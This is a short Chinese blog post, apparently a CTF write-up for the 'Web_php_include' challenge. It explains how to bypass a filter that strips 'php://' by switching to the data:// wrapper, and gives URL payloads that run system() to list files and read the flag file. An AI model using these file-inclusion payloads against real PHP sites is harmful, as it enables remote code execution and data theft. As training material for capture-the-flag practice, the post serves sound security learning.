随笔 - 51  文章 - 0  评论 - 4  阅读 - 19245

CTFer成长记录——CTF之Web专题·攻防世界-Web_php_include

一、题目链接

https://adworld.xctf.org.cn/challenges/list?rwNmOdr=1691398818171


二、解法步骤

  本题依旧是文件包含,但是这题不同,

while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}

  这条语句过滤掉了以往的php://filter/read=convert.base64-encode/resource=flag.php方式。绕过方式就是换一个伪协议,比如将php://换成data://text/plain,

  payload:?page=data://text/plain,<? system('ls;');?>

  然后尝试cat fl4gisisish3r3.php:

  ?page=data://text/plain,<?php system('cat fl4gisisish3r3.php');?>,如果页面没显示出来,就用bp抓包:

  

  得到flag。

三、总结

  本题是对文件包含的其他伪协议的运用,例如data://text/plain,<?php 代码?>,积累下来吧。

posted on   MiracleWolf  阅读(98)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
< 2025年3月 >
23 24 25 26 27 28 1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30 31 1 2 3 4 5

点击右上角即可分享
微信分享提示